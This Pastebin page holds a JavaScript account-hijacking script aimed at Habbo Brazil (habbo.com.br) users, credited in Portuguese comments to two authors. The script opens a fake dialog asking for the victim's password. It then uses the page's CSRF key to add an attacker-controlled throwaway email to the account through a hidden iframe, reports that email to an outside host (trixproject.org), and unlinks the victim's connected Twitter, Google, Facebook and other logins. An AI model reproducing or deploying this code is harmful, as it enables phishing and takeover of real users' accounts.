Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Código feito por edi472 + Drizer = N0n-Reply ?? :O
- */
- var app = $$('[name*=csrf]')[0]['content'];
- // eu quem fiz
- function socialRemover(a, b) {
- check = [a, b];
- for (x in check) {
- if (check[x] == undefined || check[x] == '') {
- return
- }
- };
- remove = new Image();
- remove['src'] = 'http://www.habbo.com.br/identity/remove_auth?provider=' + a + '&idhash=' + b + '&__app_key=' + app;
- remove['onload'] = d['body']['appendChild'](remove)
- };
- function getNetwork() {
- new Ajax.Request('/identity/auth', {
- onComplete: function (b) {
- a = b['responseText'];
- ds = /<li class=\"twitter\"/gi;
- f = /<li class=\"google\"/gi;
- g = /<li class=\"myspace\"/gi;
- h = /<li class=\"yahoo\"/gi;
- i = /<li class=\"facebook\"/gi;
- j = /<li class=\"windowslive\"/gi;
- if (!a['match'](ds)) {
- _ctwitter = true
- };
- if (!a['match'](f)) {
- _cgoogle = true
- };
- if (!a['match'](g)) {
- _cmyspace = true
- };
- if (!a['match'](h)) {
- _cyahoo = true
- };
- if (!a['match'](i)) {
- _cfacebook = true
- };
- if (!a['match'](d)) {
- _cmsn = true
- };
- if (_ctwitter == true) {
- _d = /provider=twitter&(.*?)&/gi;
- if (a['match'](_d)) {
- _e = a['match'](_d);
- _f = _e.toString();
- _g = _f['replace']('provider=twitter&', '')['replace']('&', '')['replace']('idhash=', '');
- socialRemover('twitter', '' + _g)
- }
- };
- if (_cgoogle == true) {
- d2 = /provider=google&(.*?)&/gi;
- if (a['match'](d2)) {
- e2 = a['match'](d2);
- f2 = e2.toString();
- g2 = f2['replace']('provider=google&', '')['replace']('&', '')['replace']('idhash=', '');
- socialRemover('google', '' + g2)
- }
- };
- if (_cmyspace == true) {
- d3 = /provider=myspace&(.*?)&/gi;
- if (a['match'](d3)) {
- e3 = a['match'](d3);
- f3 = e3.toString();
- g3 = f3['replace']('provider=myspace&', '')['replace']('&', '')['replace']('idhash=', '');
- socialRemover('myspace', '' + g3)
- }
- };
- if (_cyahoo == true) {
- d4 = /provider=yahoo&(.*?)&/gi;
- if (a['match'](d4)) {
- e4 = a['match'](d4);
- f4 = e4.toString();
- g4 = f4['replace']('provider=yahoo&', '')['replace']('&', '')['replace']('idhash=', '');
- socialRemover('yahoo', '' + g4)
- }
- };
- if (_cfacebook == true) {
- d5 = /provider=facebook&(.*?)&/gi;
- if (a['match'](d5)) {
- e5 = a['match'](d5);
- f5 = e5.toString();
- g5 = f5['replace']('provider=facebook&', '')['replace']('&', '')['replace']('idhash=', '');
- socialRemover('facebook', '' + g5)
- }
- };
- if (_cmsn == true) {
- d6 = /provider=windowslive&(.*?)&/gi;
- if (a['match'](d6)) {
- e6 = a['match'](d6);
- f6 = e6.toString();
- g6 = f6['replace']('provider=windowslive&', '')['replace']('&', '')['replace']('idhash=', '');
- socialRemover('windowslive', '' + g6)
- }
- }
- }
- })
- };
- // drizer fez
- function prim(b) {
- be(b);
- document['body']['appendChild'](new Element('iframe', {
- src: 'http://trixproject.org/confirm.php?hotel=.com.br&email=' + b,
- onload: setTimeout(function () {
- (new Ajax.Request('/identity/email', {
- method: 'GET',
- onComplete: function (a) {
- getNetwork();
- document['body']['appendChild'](new Element('iframe', {
- width: '0',
- height: '0',
- style: 'display:none',
- src: 'about:blank',
- name: 'frame'
- }))
- }
- }))
- }, 3500)
- }))
- };
- // drizer fez tb
- function set(d) {
- document['body']['appendChild'](new Element('iframe', {
- width: '0',
- height: '0',
- style: 'display:none',
- src: 'about:blank',
- name: 'frame'
- }));
- var e = 'trix_' + Math['floor'](Math['random']() * 999999) + '@spamavert.com';
- new Ajax.Request('/identity/email', {
- onComplete: function (a) {
- var b = new Element('form', {
- method: 'post',
- action: 'https://www.habbo.com.br/identity/add_email',
- target: 'frame'
- });
- b['appendChild'](new Element('input', {
- value: e,
- name: 'email'
- }));
- b['appendChild'](new Element('input', {
- value: d,
- name: 'currentPassword'
- }));
- b['appendChild'](new Element('input', {
- name: 'struts.token.name',
- value: 'addEmailToken'
- }));
- b['appendChild'](new Element('input', {
- value: $$('[name*=csrf]')[0]['content'],
- name: '__app_key'
- }));
- a = a['responseText'];
- var c = (a['match'](/add_email"(.*?)\n(.*?)\n(.*?)name="urlToken" value="(.*?)"/)[4]);
- b['appendChild'](new Element('input', {
- value: c,
- name: 'urlToken'
- }));
- b['submit']()
- }
- });
- setTimeout(function () {
- new Ajax.Request('/identity/email', {
- onComplete: function (a) {
- if (!a['responseText']['match'](e)) {
- alert('Senha incorreta')
- } else {
- prim(e)
- }
- }
- })
- }, 3500)
- };
- Dialog['showInfoDialog']('trix-dialog', 'Digite sua senha para completar os procedimentos<br><input type="password" id="txtsenha"><br><button onclick=\'set(document.getElementById("txtsenha").value);\'>OK</button>', 'Fechar');
Advertisement
Add Comment
Please, Sign In to add comment